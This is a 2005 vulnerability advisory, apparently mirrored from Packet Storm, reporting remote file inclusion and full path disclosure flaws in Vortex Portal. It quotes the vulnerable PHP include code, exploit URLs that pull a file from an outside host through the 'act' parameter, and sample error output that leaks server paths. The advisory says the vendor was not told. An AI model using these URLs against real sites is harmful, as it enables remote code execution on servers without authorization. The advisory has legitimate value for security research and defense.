Lucene search
K

vortex.txt

🗓️ 24 Mar 2005 00:00:00Reported by Dominus VisType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

Vortex Portal has remote file inclusion and full path disclosure vulnerabilities present.

Code
`  
  
Vortex Portal Multiples Bugs  
  
Vendor: http://www.VortexPortal.net  
Contact: Brian Price Email: [email protected]  
  
I. Remote File Inclusion:  
  
content.php -->  
  
...  
if (!isset($act)) {  
require_once("main.php");  
} else {  
require_once("$act.php");  
...  
?>  
  
index.php -->  
...  
require_once($root_dir."/content.php");  
...  
  
Exploits  
http://[target-host]/index.php?act=http://[host]/file  
http://[target-host]/content.php?act=http://[host]/file  
  
II. Full Path Disclosure  
http://[target-host]/content.php?act=something-wrong  
and we've get :  
  
Warning: main(something-wrond.php): failed to open stream: No such file or directory in /home/*/content.php on line 9  
  
Fatal error: main(): Failed opening required 'something-wrond.php' (include_path='.:/usr/local/lib/php:/usr/lib/php:../:../') in /home/*/content.php on line 9  
  
Ps.: the vendor wasn't informed.  
  
[ Infektion Group ]  
by Dominus_Vis  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Mar 2005 00:00Current
7.4High risk
Vulners AI Score7.4
23